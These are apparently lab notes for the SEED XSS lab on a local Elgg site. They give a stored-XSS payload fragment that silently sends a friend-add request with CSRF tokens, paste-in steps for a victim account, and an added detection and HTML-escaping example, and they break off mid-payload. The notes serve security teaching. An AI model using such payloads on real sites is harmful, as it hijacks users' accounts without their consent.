SEED Lab - Web Security 2 - XSS Lab
1. Lab Setup
Same as the CSRF lab.
2. XSS Attack - add friend
2.1 Vim "xssaddfriend.txt"
var sendurl="http://www.xsslabelgg.com/action/friends/add"+"?friend=47"+token+ts;
Ajax.open("GET",sendurl,true);
2.2 Open www.xsslabelgg.com.
Log in as Samy/seedsamy.
Edit profile, About field: copy and paste the script from xssaddfriend.txt, then save.
2.3 Alice visits Members - Samy
Log in as Alice/seedalice and browse Members, Samy; Samy is then added as a friend automatically.
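A defensive counterpart to section 2, as an added example that is not part of the original lab notes: it renders the stored About value as inert text and flags stored values that carry script or reference an /action/ endpoint. The function names (escapeHtml, renderAbout, flagStoredScript) are hypothetical and the sample profile value is constructed.

```javascript
// Added example (not from the lab notes). Function names are hypothetical
// and the sample profile value is constructed for illustration.

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render the profile About field as text, so the browser never parses it as markup.
function renderAbout(about) {
  return '<div class="profile-about">' + escapeHtml(about) + "</div>";
}

// Review a stored profile value: report markup that can execute script and
// any reference to a state-changing /action/ endpoint.
function flagStoredScript(about) {
  const findings = [];
  if (/<\s*script\b/i.test(about)) findings.push("script-tag");
  if (/\bon[a-z]+\s*=/i.test(about)) findings.push("inline-event-handler");
  if (/javascript\s*:/i.test(about)) findings.push("javascript-url");
  if (/\/action\/[a-z_\/]+/i.test(about)) findings.push("action-endpoint-reference");
  return findings;
}

// Constructed sample: a stored About value shaped like the one saved in step 2.2.
const storedAbout =
  '<script type="text/javascript">' +
  'var sendurl="http://www.xsslabelgg.com/action/friends/add"+"?friend=47"+token+ts;' +
  "</script>";

console.log(renderAbout(storedAbout));        // escaped, displayed as plain text
console.log(flagStoredScript(storedAbout));   // findings for the stored value
console.log(flagStoredScript("I like hiking & photos")); // benign text, no findings
```

With the About field rendered through renderAbout, Alice's browser in step 2.3 shows the pasted text instead of running it.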
3. XSS Attack - edit profile
3.1 Vim xsseditprofile.txt
var desc="&